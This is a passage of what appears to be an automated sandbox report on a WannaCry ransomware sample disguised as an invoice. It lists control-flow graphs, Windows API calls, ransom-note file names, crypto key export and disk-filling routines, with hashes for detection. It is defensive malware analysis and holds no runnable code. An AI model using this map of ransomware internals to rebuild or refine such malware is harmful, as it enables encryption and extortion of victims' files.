2274->2276 2275->2276 2277 100021d4 wcslen 2276->2277 2278 100021cd CloseHandle 2276->2278 2279 100021f5 2277->2279 2280 100021e8 DeleteFileW 2277->2280 2278->2277 2280->2279 2286 10006c0c ??1type_info@@UAE 2287 10006c22 2286->2287 2288 10006c1b ??3@YAXPAX 2286->2288 2288->2287 2264 100053f0 GetUserNameW _wcsicmp 2265 10005452 2264->2265 2266 10005444 2264->2266 2267 100027f0 168 API calls 2265->2267 2268 10005468 2267->2268 2289 10005d90 2290 10005d98 2289->2290 2291 10005da8 2290->2291 2292 10005d9f ??3@YAXPAX 2290->2292 2292->2291 2332 10006ef0 ??3@YAXPAX 2269 10003ff3 2270 10004001 2269->2270 2271 10003ffa GlobalFree 2269->2271 2272 10004010 2270->2272 2273 10004009 FindCloseChangeNotification 2270->2273 2271->2270 2273->2272 2293 10006e16 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 2309 10006cdf 2311 10006cfb 2309->2311 2313 10006cf2 2309->2313 2311->2313 2316 10006d23 2311->2316 2317 10006c34 2311->2317 2312 10006d43 2315 10006c34 3 API calls 2312->2315 2312->2316 2313->2312 2314 10006c34 3 API calls 2313->2314 2313->2316 2314->2312 2315->2316 2318 10006c3c 2317->2318 2319 10006c5d malloc 2318->2319 2320 10006c72 2318->2320 2322 10006c9c 2318->2322 2319->2320 2321 10006c76 _initterm 2319->2321 2320->2313 2321->2320 2322->2320 2323 10006cc9 free 2322->2323 2323->2320

                                                            Executed Functions

                                                            Function 10001960 Relevance: 75.8, APIs: 41, Strings: 2, Instructions: 598filetimeCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 0 10001960-10001a05 1 10001a12-10001a32 CreateFileW 0->1 2 10001a07-10001a0c 0->2 3 10001a74-10001a84 GetFileSizeEx 1->3 4 10001a34-10001a42 call 10003000 1->4 2->1 6 10001a91-10001ac8 GetFileTime ReadFile 3->6 7 10001a86-10001a8c 3->7 14 10002088-1000208d 4->14 15 10001a48-10001a68 CreateFileW 4->15 10 10001b98-10001bb1 SetFilePointer 6->10 11 10001ace-10001ae2 6->11 9 1000208e-100020a8 _local_unwind2 7->9 12 10001bb7-10001bff swprintf CreateFileW 10->12 13 10001c5b-10001c79 ReadFile 10->13 11->10 16 10001ae8-10001b08 ReadFile 11->16 17 10001c01-10001c2b CreateFileW 12->17 18 10001c38-10001c3f 12->18 13->14 20 10001c7f-10001c89 13->20 14->9 15->3 19 10001a6a-10001a6f 15->19 16->10 21 10001b0e-10001b19 16->21 17->18 23 10001c2d-10001c33 17->23 24 10001c45-10001c56 18->24 25 10001d2e-10001d32 18->25 19->9 20->14 26 10001c8f-10001cb6 SetFilePointer WriteFile 20->26 21->10 22 10001b1b-10001b20 21->22 22->10 27 10001b22-10001b42 ReadFile 22->27 23->9 24->25 28 10001d34-10001d3c 25->28 29 10001d8e-10001dbc call 10004370 25->29 26->23 30 10001cbc-10001cc6 26->30 27->10 31 10001b44-10001b65 ReadFile 27->31 28->29 32 10001d3e-10001d48 28->32 36 10001dbe-10001dc4 29->36 43 10001dc9-10001df4 call 10005dc0 29->43 30->23 34 10001ccc-10001d03 SetFilePointer WriteFile 30->34 31->10 37 10001b67-10001b70 31->37 32->29 38 10001d4a-10001d52 32->38 35 10001d09-10001d13 34->35 34->36 35->36 40 10001d19-10001d28 SetFilePointer 35->40 36->9 37->10 41 10001b72-10001b95 _local_unwind2 37->41 38->29 42 10001d54-10001d64 rand 38->42 40->25 42->29 44 10001d66-10001d72 42->44 48 10001dfa-10001dfc 43->48 44->29 46 10001d74-10001d88 44->46 46->29 49 10001e11-10001e2a WriteFile 48->49 50 10001dfe-10001e0f 48->50 49->14 51 10001e30-10001e4b WriteFile 49->51 50->48 51->14 52 10001e51-10001e71 WriteFile 51->52 52->14 53 10001e77-10001e8f WriteFile 52->53 53->14 54 10001e95-10001eb0 WriteFile 53->54 54->14 55 10001eb6-10001eba 54->55 56 10001ec0-10001edf 55->56 57 100020b7-100020d8 SetFileTime 55->57 60 10001ee5-10001f13 SetFilePointer ReadFile 56->60 61 10001f9b-10001fa3 56->61 58 10002130-10002155 CloseHandle MoveFileW 57->58 59 100020da-1000210e FindCloseChangeNotification CloseHandle MoveFileW 57->59 66 10002158-1000215a 58->66 64 10002110-1000211f SetFileAttributesW 59->64 65 10002121-1000212e DeleteFileW 59->65 60->23 67 10001f19-10001f23 60->67 62 10001fa9 61->62 63 100020ab-100020b1 61->63 68 10001fb9-10001fc1 62->68 69 10001fab-10001fb3 62->69 63->57 64->66 65->66 70 10002189-100021a9 _local_unwind2 66->70 71 1000215c-10002164 66->71 67->23 72 10001f29-10001f64 call 10006940 WriteFile 67->72 73 10001fc3-10001fc6 68->73 74 10001fcc-10001ff0 ReadFile 68->74 69->63 69->68 71->70 75 10002166-10002186 71->75 72->36 80 10001f6a-10001f74 72->80 73->14 73->74 74->36 77 10001ff6-10001ffe 74->77 75->70 77->36 79 10002004-10002023 77->79 81 10002041-1000207a call 10006940 WriteFile 79->81 82 10002025-1000203f 79->82 80->36 83 10001f7a-10001f94 SetFilePointer 80->83 81->14 86 1000207c-10002082 81->86 82->81 83->61 86->14 86->61
                                                            APIs
                                                            • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?), ref: 10001A21
                                                            • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?), ref: 10001A57
                                                            • GetFileSizeEx.KERNEL32(00000000,?,?,?), ref: 10001A7C
                                                            • GetFileTime.KERNEL32(00000000,?,?,?,?,?), ref: 10001AA7
                                                            • ReadFile.KERNELBASE(00000000,?,00000008,?,00000000,?,?), ref: 10001AC0
                                                            • ReadFile.KERNEL32(?,?,00000004,?,00000000,?,?), ref: 10001B00
                                                            • ReadFile.KERNEL32(?,?,?,?,00000000,?,?), ref: 10001B3A
                                                            • ReadFile.KERNEL32(?,?,00000004,?,00000000,?,?), ref: 10001B5D
                                                            • _local_unwind2.MSVCRT ref: 10001B78
                                                            • _local_unwind2.MSVCRT ref: 1000208E
                                                            • SetFileTime.KERNELBASE(?,?,?,?,?,?), ref: 100020CD
                                                            • FindCloseChangeNotification.KERNELBASE(?,?,?), ref: 100020DA
                                                            • CloseHandle.KERNEL32(?,?,?), ref: 100020E1
                                                            • MoveFileW.KERNEL32(?,?), ref: 10002101
                                                            • SetFileAttributesW.KERNELBASE(?,00000080,?,?), ref: 10002119
                                                            • DeleteFileW.KERNEL32(?,?,?), ref: 10002128
                                                            • CloseHandle.KERNEL32(?,?,?), ref: 10002130
                                                            • MoveFileW.KERNEL32(?,?), ref: 1000214D
                                                            • _local_unwind2.MSVCRT ref: 1000218F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: File$Read$Close_local_unwind2$CreateHandleMoveTime$AttributesChangeDeleteFindNotificationSize
                                                            • String ID: %s%s$WANACRY!
                                                            • API String ID: 2042663167-3951969912
                                                            • Opcode ID: 23b110fa1eaf302a1690ae2ada5f59b11b6c089050db00894cddd4ed701fb794
                                                            • Instruction ID: 1cd18d78d3b1adc01fd8983c6b1e49359ce7f15159302df972715ebca2b9e78f
                                                            • Opcode Fuzzy Hash: 23b110fa1eaf302a1690ae2ada5f59b11b6c089050db00894cddd4ed701fb794
                                                            • Instruction Fuzzy Hash: DE326571A41229ABEB25DF54CC85FEA73B8FB48790F0042A9F619A7184D7709E84CF64
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 10002300 Relevance: 49.4, APIs: 23, Strings: 5, Instructions: 373fileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 141 10002300-100023ad ??2@YAPAXI@Z call 10003730 swprintf FindFirstFileW 144 10002413-10002422 call 10002f70 141->144 145 100023af-1000240e call 100036a0 ??3@YAXPAX@Z call 100037c0 ??3@YAXPAX@Z 141->145 151 10002426-1000242e 144->151 155 100027c9-100027e1 145->155 153 10002430-10002432 151->153 154 10002438-10002449 wcscmp 151->154 153->154 156 10002642-10002658 FindClose 153->156 157 1000262a-1000263c FindNextFileW 154->157 158 1000244f-10002460 wcscmp 154->158 159 10002688-10002692 156->159 160 1000265a-10002669 call 10002940 156->160 157->151 157->156 158->157 161 10002466-1000248f swprintf 158->161 163 10002694-100026b2 _wcsnicmp 159->163 164 100026df-100026e2 159->164 176 1000266b-10002677 call 10003760 160->176 177 1000267c-10002684 160->177 165 10002521-10002525 161->165 166 10002495-100024ab call 100032c0 161->166 171 100026b4-100026b9 163->171 172 100026bb 163->172 167 100026e4-100026e8 164->167 168 1000270d-1000271a 164->168 165->157 170 1000252b-1000253c wcscmp 165->170 166->157 182 100024b1-10002503 ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z wcslen ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z call 100035c0 166->182 167->168 175 100026ea-100026ff call 10003200 167->175 180 10002746-10002754 168->180 181 1000271c-10002720 168->181 170->157 178 10002542-10002553 wcscmp 170->178 179 100026c0-100026c8 171->179 172->179 204 10002701 call 10003280 175->204 205 10002708 call 10003240 175->205 176->177 177->160 188 10002686 177->188 178->157 187 10002559-1000256a wcscmp 178->187 189 100026ca-100026ce 179->189 190 100026dd 179->190 184 10002771-1000278c ??3@YAXPAX@Z 180->184 185 10002756-1000276b call 10003620 180->185 181->180 191 10002722 181->191 203 10002508-1000251c ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z 182->203 199 100027b7-100027c4 ??3@YAXPAX@Z 184->199 200 1000278e-100027b5 ??3@YAXPAX@Z 184->200 210 1000276d 185->210 187->157 198 10002570-100025a0 call 10002d60 187->198 188->159 192 100026d0 189->192 193 100026d1-100026db 189->193 190->164 194 10002723-10002728 191->194 192->193 193->189 193->190 201 1000272a 194->201 202 1000272f-10002744 call 10002300 194->202 198->157 215 100025a6-100025a9 198->215 199->155 200->199 200->200 201->202 202->180 202->194 203->157 214 10002706 204->214 205->168 210->184 214->168 215->157 216 100025ab-100025ad 215->216 217 100025bf-10002625 wcsncpy * 2 call 10003760 216->217 218 100025af-100025b3 216->218 217->157 218->217 220 100025b5-100025bd 218->220 220->157 220->217
                                                            APIs
                                                            • ??2@YAPAXI@Z.MSVCRT ref: 10002332
                                                              • Part of subcall function 10003730: ??2@YAPAXI@Z.MSVCRT ref: 10003732
                                                            • swprintf.MSVCRT ref: 10002388
                                                            • FindFirstFileW.KERNELBASE(?,?,?,00000000,00000000,?), ref: 1000239E
                                                            • ??3@YAXPAX@Z.MSVCRT ref: 100023D2
                                                              • Part of subcall function 100037C0: ??3@YAXPAX@Z.MSVCRT ref: 100037E5
                                                            • ??3@YAXPAX@Z.MSVCRT ref: 10002404
                                                            • wcscmp.MSVCRT ref: 10002442
                                                            • wcscmp.MSVCRT ref: 10002459
                                                            • swprintf.MSVCRT(?,%s\%s,?,?), ref: 10002480
                                                            • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000000,?,?), ref: 100024BE
                                                            • wcslen.MSVCRT ref: 100024CC
                                                            • ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z.MSVCP60(?,00000000), ref: 100024E2
                                                            • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 10002516
                                                            • FindNextFileW.KERNELBASE(?,?), ref: 10002634
                                                            • FindClose.KERNELBASE(?), ref: 10002643
                                                              • Part of subcall function 100036A0: ??3@YAXPAX@Z.MSVCRT ref: 100036F6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: ??3@$FindG@2@@std@@G@std@@U?$char_traits@V?$allocator@$??2@FileTidy@?$basic_string@swprintfwcscmp$?assign@?$basic_string@CloseFirstNextV12@wcslen
                                                            • String ID: %s\%s$%s\*$@Please_Read_Me@.txt$@WanaDecryptor@.bmp$@WanaDecryptor@.exe.lnk
                                                            • API String ID: 3909534679-268640142
                                                            • Opcode ID: 8e91527c5bf5cb74e5efc59b8c6c131fb9f7429ce5b3cab5469d33bef72cfbd8
                                                            • Instruction ID: de254d0e5b2da72f41e6c310beb378338d29d9cbc8abb0440bfd0675c5201551
                                                            • Opcode Fuzzy Hash: 8e91527c5bf5cb74e5efc59b8c6c131fb9f7429ce5b3cab5469d33bef72cfbd8
                                                            • Instruction Fuzzy Hash: 38D1B1755083819FE720DB64C880AABB7E8FFC9384F10491DF99983255EB75E909CB93
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 10004A40 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 200COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?,7598A390,7633DC30,75AA2EE0,?), ref: 10004A97
                                                            • wcslen.MSVCRT ref: 10004A9E
                                                            • wcsrchr.MSVCRT ref: 10004AC0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: FolderPathwcslenwcsrchr
                                                            • String ID: %s\%s\%s$%s\*.*
                                                            • API String ID: 546322749-1899009126
                                                            • Opcode ID: 8a6f2f974920d52717d03da3a36b72289499b9d186961dda4ecc416d09510b88
                                                            • Instruction ID: f3627253bfd0e675d6c72d42cf14d2781f3e5a035430ee9dadabd35bed43a83c
                                                            • Opcode Fuzzy Hash: 8a6f2f974920d52717d03da3a36b72289499b9d186961dda4ecc416d09510b88
                                                            • Instruction Fuzzy Hash: 4761D8B2504345ABF320DB64DC88FEB73E8FFC4395F01492DEA8982144EB75A509C7A6
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 10005190 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 117filesleepmemoryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 356 10005190-100051c9 GetDriveTypeW 357 100052ee-100052f7 356->357 358 100051cf-100051e0 GlobalAlloc 356->358 358->357 359 100051e6-10005237 call 10005120 CreateFileW 358->359 362 10005239-10005249 GlobalFree 359->362 363 1000524a-10005261 MoveFileExW 359->363 364 10005263 363->364 365 100052cd-100052ed GlobalFree FlushFileBuffers CloseHandle DeleteFileW 363->365 366 10005269-10005285 GetDiskFreeSpaceExW 364->366 365->357 366->365 367 10005287-1000528d 366->367 368 10005299 367->368 369 1000528f-10005297 367->369 370 1000529b-100052b1 WriteFile 368->370 369->365 369->368 370->365 371 100052b3-100052bb Sleep 370->371 371->370 372 100052bd-100052cb Sleep 371->372 372->365 372->366
                                                            APIs
                                                            • GetDriveTypeW.KERNELBASE(00000000,00000001,00000000,00000000), ref: 100051C0
                                                            • GlobalAlloc.KERNELBASE(00000000,00A00000), ref: 100051D6
                                                              • Part of subcall function 10005120: swprintf.MSVCRT(?,%s\hibsys%s,?,.WNCRYT), ref: 1000516A
                                                              • Part of subcall function 10005120: DeleteFileW.KERNELBASE(?), ref: 10005174
                                                            • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000002,00000000), ref: 1000522C
                                                            • GlobalFree.KERNEL32(00000000), ref: 1000523A
                                                            • MoveFileExW.KERNELBASE(?,00000000,00000004,75AA3300), ref: 10005254
                                                            • GetDiskFreeSpaceExW.KERNELBASE(?,?,?,?), ref: 1000527D
                                                            • WriteFile.KERNELBASE(00000000,00000000,00A00000,?,00000000), ref: 100052A9
                                                            • Sleep.KERNELBASE(0000000A), ref: 100052B5
                                                            • Sleep.KERNELBASE(00002710), ref: 100052C2
                                                            • GlobalFree.KERNEL32(00000000), ref: 100052CE
                                                            • FlushFileBuffers.KERNEL32(00000000), ref: 100052D5
                                                            • CloseHandle.KERNEL32(00000000), ref: 100052DC
                                                            • DeleteFileW.KERNEL32(?), ref: 100052E7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: File$FreeGlobal$DeleteSleep$AllocBuffersCloseCreateDiskDriveFlushHandleMoveSpaceTypeWriteswprintf
                                                            • String ID: :\$UUUU
                                                            • API String ID: 3329057766-2502105546
                                                            • Opcode ID: b42e683e316584ab492aa5f58972f8961f4bf75bae1380fa580a2c89d59e7ee4
                                                            • Instruction ID: c3553bfb2ce832e5e524584dfb39294b6681cea42b2672b67cd9b1e4f92b37f1
                                                            • Opcode Fuzzy Hash: b42e683e316584ab492aa5f58972f8961f4bf75bae1380fa580a2c89d59e7ee4
                                                            • Instruction Fuzzy Hash: 6241A031604311ABF300EB64DC89FAF77E9FF85791F100A29FA45861D4EB79E9488762
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 100011D0 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 100COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • GetCurrentProcess.KERNEL32 ref: 100011E4
                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 100011EB
                                                            • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,?,?), ref: 10001214
                                                            • GetLastError.KERNEL32 ref: 1000121A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: ProcessToken$CurrentErrorInformationLastOpen
                                                            • String ID: ConvertSidToStringSidW$advapi32.dll
                                                            • API String ID: 3761956567-1399820460
                                                            • Opcode ID: 303a435fe0c47bc2ab0ad51a806ed00c7655853782dcd7968111a56573c8e81e
                                                            • Instruction ID: 47968a519e593bd1c62a1f3d62b818a3899146cc2fa57af3534c2703d8e63c9f
                                                            • Opcode Fuzzy Hash: 303a435fe0c47bc2ab0ad51a806ed00c7655853782dcd7968111a56573c8e81e
                                                            • Instruction Fuzzy Hash: 2121C375A00212ABE300DB28EC85FEB37E8FFC06D5F404929F948C2158E374D94986A2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 10004F20 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 90fileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • swprintf.MSVCRT(?,%s\%s,?,@WanaDecryptor@.bmp), ref: 10004F7C
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,b.wnry,000000FF,?,00000103), ref: 10004F99
                                                            • CopyFileW.KERNELBASE(?,?,00000000), ref: 10004FB4
                                                            • GetUserNameW.ADVAPI32 ref: 10004FF0
                                                            • _wcsicmp.MSVCRT ref: 10005006
                                                            • KiUserCallbackDispatcher.NTDLL(00000014,00000000,?,00000001), ref: 1000501E
                                                            • swprintf.MSVCRT(?,%s\%s,?,@WanaDecryptor@.exe), ref: 10005034
                                                            • CopyFileW.KERNELBASE(@WanaDecryptor@.exe,?,00000000), ref: 10005045
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: CopyFileUserswprintf$ByteCallbackCharDispatcherMultiNameWide_wcsicmp
                                                            • String ID: %s\%s$@WanaDecryptor@.bmp$@WanaDecryptor@.exe$b.wnry
                                                            • API String ID: 2267108377-163098832
                                                            • Opcode ID: bf392daa0d3de960360cd3c4300729d8e512d5ebde27cbd7410bd1becd215d1f
                                                            • Instruction ID: e55c92b8c82600a83f2bc68813337d3839c0dc3b58a337792abbc0111089e87c
                                                            • Opcode Fuzzy Hash: bf392daa0d3de960360cd3c4300729d8e512d5ebde27cbd7410bd1becd215d1f
                                                            • Instruction Fuzzy Hash: 1F319F7154430AAAF720DB64CC84FEBB3A9FBD8780F004928F74897194E675A54987B7
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 10004040 Relevance: 10.6, APIs: 7, Instructions: 110filememoryencryptionCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CryptExportKey.ADVAPI32(?,00000000,?,00000000,00000000,00000008), ref: 10004087
                                                            • GlobalAlloc.KERNEL32(00000000,00000008), ref: 1000409E
                                                            • _local_unwind2.MSVCRT ref: 100040D0
                                                            • CreateFileA.KERNELBASE(10003B63,40000000,00000000,00000000,00000002,00000080,00000000), ref: 10004101
                                                            • WriteFile.KERNELBASE(00000000,00000000,00000008,?,00000000), ref: 10004122
                                                            • _local_unwind2.MSVCRT ref: 10004132
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: File_local_unwind2$AllocCreateCryptExportGlobalWrite
                                                            • String ID:
                                                            • API String ID: 3505601379-0
                                                            • Opcode ID: e4b24a4896234405ddc3ddca99fc1a5403f2d49dbf9026041e1240e4559407fe
                                                            • Instruction ID: f2e4c173d5c66980f3caf99a3bd82662d3c6a30a16efd476d92b7f0e9405a5ca
                                                            • Opcode Fuzzy Hash: e4b24a4896234405ddc3ddca99fc1a5403f2d49dbf9026041e1240e4559407fe
                                                            • Instruction Fuzzy Hash: 4E3150B1D10225ABE720CB948C45FEFB7BCFB49BA0F200759FA25B21C4E775690487A4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 10003F00 Relevance: 10.6, APIs: 7, Instructions: 107fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 10003F45
                                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 10003F5B
                                                            • _local_unwind2.MSVCRT ref: 10004017
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: File$CreateSize_local_unwind2
                                                            • String ID:
                                                            • API String ID: 1039228802-0
                                                            • Opcode ID: a418ad88937dbf3f3f2f90a93e697cbecaf6d1334aa3d5b8eb2f9d90e99da0df
                                                            • Instruction ID: e4fcb762b0a2cf85546a5226953a162905cdc9c51df010501401105139b3880b
                                                            • Opcode Fuzzy Hash: a418ad88937dbf3f3f2f90a93e697cbecaf6d1334aa3d5b8eb2f9d90e99da0df
                                                            • Instruction Fuzzy Hash: C23150B1D04219ABEB10CF988C84FBFB7BCF7487A0F104729FA28A22D4E73558018764
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 10004170 Relevance: 7.7, APIs: 5, Instructions: 168encryptionCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CryptExportKey.ADVAPI32(?,00000000,?,00000000,?,?,00000008,?,?,?,10003C7F,?,?,?,00000007,00000000), ref: 100041AD
                                                            • CryptGetKeyParam.ADVAPI32(?,00000008,?,?,00000000,?,?,10003C7F,?,?,?,00000007,00000000), ref: 100041DF
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: Crypt$ExportParam
                                                            • String ID:
                                                            • API String ID: 2541419234-0
                                                            • Opcode ID: 83fd7636ed65e7b4624369af09241801eb1dccb5b71602364eee19c08e2797c0
                                                            • Instruction ID: 80228a1e7adbe0cc537bf2fc0d3ef992fb5bf6351f3b42e9d805a86e7a99636c
                                                            • Opcode Fuzzy Hash: 83fd7636ed65e7b4624369af09241801eb1dccb5b71602364eee19c08e2797c0
                                                            • Instruction Fuzzy Hash: DB51E6716083428FE314CF14D888B9BB7E9FBD8394F51082EF585C7250E774AA49CB62
                                                            Uniqueness
